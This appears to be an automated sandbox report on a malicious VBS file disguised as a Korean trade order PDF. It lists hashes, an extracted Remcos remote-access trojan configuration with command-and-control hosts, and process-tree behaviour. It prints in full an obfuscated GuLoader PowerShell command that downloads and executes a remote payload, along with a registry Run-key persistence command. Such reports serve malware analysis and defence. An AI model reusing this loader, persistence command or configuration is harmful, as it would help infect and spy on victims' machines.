Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
24-06-2024 15:52
Static task
static1
Behavioral task
behavioral1
Sample
korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs
-
Size
186KB
-
MD5
8378482dfb00608563257af10d70c96d
-
SHA1
493b67c86ea9ca8ecb60f0388356ff0b8c1b5f40
-
SHA256
028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72
-
SHA512
b31c395abe57132700c6056de274dbfa92fc105d0e35c73618ec004f0639acbd3411b252374ea4a14a805cb5e4dfd817e7ca7f9096a4931f22a060e7938ec3a7
-
SSDEEP
3072:BmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZz:B08GxbKja3+DCbKCvBB/WnHXC/sLJFJ2
Malware Config
Extracted
remcos
NJARI
iwarsut775laudrye2.duckdns.org:57484
iwarsut775laudrye2.duckdns.org:57483
iwarsut775laudrye3.duckdns.org:57484
hjnourt38haoust1.duckdns.org:57484
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
sfvnspt.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
shietgtst-BB0OO6
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2056 WScript.exe 6 2708 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Corynebacterium = "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\\Triennales253\\').Udstraalingen;%Chorobates% ($Ledebjlke)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2840 wab.exe 2840 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2436 powershell.exe 2840 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2436 set thread context of 2840 2436 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2708 powershell.exe 2436 powershell.exe 2436 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2056 wrote to memory of 2708 2056 WScript.exe powershell.exe PID 2056 wrote to memory of 2708 2056 WScript.exe powershell.exe PID 2056 wrote to memory of 2708 2056 WScript.exe powershell.exe PID 2708 wrote to memory of 2680 2708 powershell.exe cmd.exe PID 2708 wrote to memory of 2680 2708 powershell.exe cmd.exe PID 2708 wrote to memory of 2680 2708 powershell.exe cmd.exe PID 2708 wrote to memory of 2436 2708 powershell.exe powershell.exe PID 2708 wrote to memory of 2436 2708 powershell.exe powershell.exe PID 2708 wrote to memory of 2436 2708 powershell.exe powershell.exe PID 2708 wrote to memory of 2436 2708 powershell.exe powershell.exe PID 2436 wrote to memory of 2548 2436 powershell.exe cmd.exe PID 2436 wrote to memory of 2548 2436 powershell.exe cmd.exe PID 2436 wrote to memory of 2548 2436 powershell.exe cmd.exe PID 2436 wrote to memory of 2548 2436 powershell.exe cmd.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2436 wrote to memory of 2840 2436 powershell.exe wab.exe PID 2840 wrote to memory of 2756 2840 wab.exe cmd.exe PID 2840 wrote to memory of 2756 2840 wab.exe cmd.exe PID 2840 wrote to memory of 2756 2840 wab.exe cmd.exe PID 2840 wrote to memory of 2756 2840 wab.exe cmd.exe PID 2756 wrote to memory of 2032 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2032 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2032 2756 cmd.exe reg.exe PID 2756 wrote to memory of 2032 2756 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\149C06M5US0JVTM1GQSQ.tempFilesize
7KB
MD511c8d663006e8d7b0f3cd4d1c7f9137c
SHA1134ec26c1013e2f4add407426c14c355b81ba868
SHA256ebc5cfb97a462d7399c7f721cddd450fd48582937380e8fdee07d945ac50ee72
SHA51262cd1e280855531834b1b32db650823bed40eb06fff724c2ed5ee303641a55df849271348873f7e40d9704c4ab936da62867214effd3f31d9ec18350acc692ad
-
C:\Users\Admin\AppData\Roaming\Tvangsarbejde.AfvFilesize
467KB
MD5ebc603f013333acdb9edeeec3419d49d
SHA1d2ae4118a93874422ffa464dc225e7da16483a91
SHA256d56548cb4c363a5243f55e8602b2f45050cdcc89fae1dbe79f38488a4cac509b
SHA512ec13e53881778cda945c180452d8ab49b90068f136462b3c0e31789dc9306b178e4ade472f5ebcadbc420405773a0a303bb92bec16b666114c2e5b21e94967d1
-
memory/2436-32-0x0000000006860000-0x000000000B51E000-memory.dmpFilesize
76.7MB
-
memory/2708-24-0x000007FEF5650000-0x000007FEF5FED000-memory.dmpFilesize
9.6MB
-
memory/2708-25-0x000007FEF5650000-0x000007FEF5FED000-memory.dmpFilesize
9.6MB
-
memory/2708-26-0x000007FEF5650000-0x000007FEF5FED000-memory.dmpFilesize
9.6MB
-
memory/2708-21-0x000007FEF590E000-0x000007FEF590F000-memory.dmpFilesize
4KB
-
memory/2708-23-0x0000000002210000-0x0000000002218000-memory.dmpFilesize
32KB
-
memory/2708-22-0x000000001B770000-0x000000001BA52000-memory.dmpFilesize
2.9MB
-
memory/2708-33-0x000007FEF5650000-0x000007FEF5FED000-memory.dmpFilesize
9.6MB
-
memory/2708-34-0x000007FEF590E000-0x000007FEF590F000-memory.dmpFilesize
4KB
-
memory/2708-40-0x000007FEF5650000-0x000007FEF5FED000-memory.dmpFilesize
9.6MB
-
memory/2840-36-0x0000000000350000-0x00000000013B2000-memory.dmpFilesize
16.4MB
-
memory/2840-37-0x00000000013C0000-0x000000000607E000-memory.dmpFilesize
76.7MB